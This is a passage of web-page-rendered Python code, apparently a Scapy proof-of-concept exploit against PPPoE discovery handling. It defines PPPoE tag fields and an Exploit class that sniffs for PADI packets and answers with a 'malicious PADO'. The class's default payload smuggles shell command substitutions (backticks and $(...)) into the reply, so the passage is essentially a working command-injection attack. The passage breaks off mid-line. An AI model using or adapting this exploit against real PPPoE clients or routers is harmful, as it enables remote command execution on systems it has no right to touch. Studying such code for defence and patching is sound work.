id=\"crayon-58f7e28ed7cd5140451019-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0104<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;AC-Cookie&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0105<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Vendor-Specific&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0110<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Relay-Session-Id&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0201<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Service-Name-Error&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0202<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;AC-System-Error&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x0203<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Generic-Error&#8217;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">FieldLenField<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;tag_len&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">length_of<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;tag_value&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;H&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">StrLenField<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;tag_value&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">length_from<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">lambda <\/span><span class=\"crayon-v\">pkt<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">pkt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">tag_len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-26\"><span class=\"crayon-p\"># bind layers for auto-dissection<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-27\"><span class=\"crayon-e\">bind_layers<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PPPoED<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PPPoE_Tag<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-28\"><span class=\"crayon-e\">bind_layers<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PPPoE_Tag<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Padding<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-29\"><span class=\"crayon-e\">bind_layers<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PPPoE_Tag<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PPPoE_Tag<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-31\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iface<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;eth0&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;`echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cmd<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-35\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">conf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">iface<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">iface<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-36\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;sniffing on %r and trying to inject %r&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">iface<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;waiting for PPPoED PADI&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sniff<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">prn<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">attack<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;not tcp and not udp&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">attack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pkt<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoE_Tag <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pkt <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pkt<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;got PPPoED packet, checking if it is a PPPoED PADI&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pkt<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">PPPoED<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-cn\">0x09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#PADI<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;PPPoED PADI detected, &#8220;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pkt<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">PPPoED<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">show<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">host_uniq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">payload<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-53\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;-&gt; %s&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;PPoE&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-s\">&#8220;PPPoE Tag&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-cn\">0x0103<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Host-Uniq<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">host_uniq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">layer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tag_value<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-62\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;got host_uniq: %r&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">host_uniq<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;sending malicious PADO&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">retp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Ether<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dst<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">pkt<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">Ether<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">get_if_hwaddr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">conf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">iface<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">PPPoED<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;PADO&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PPPoE_Tag<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;Service-Name&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;lol&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PPPoE_Tag<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;Host-Uniq&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">host_uniq<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PPPoE_Tag<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;AC-Cookie&#8221;<\/span><span 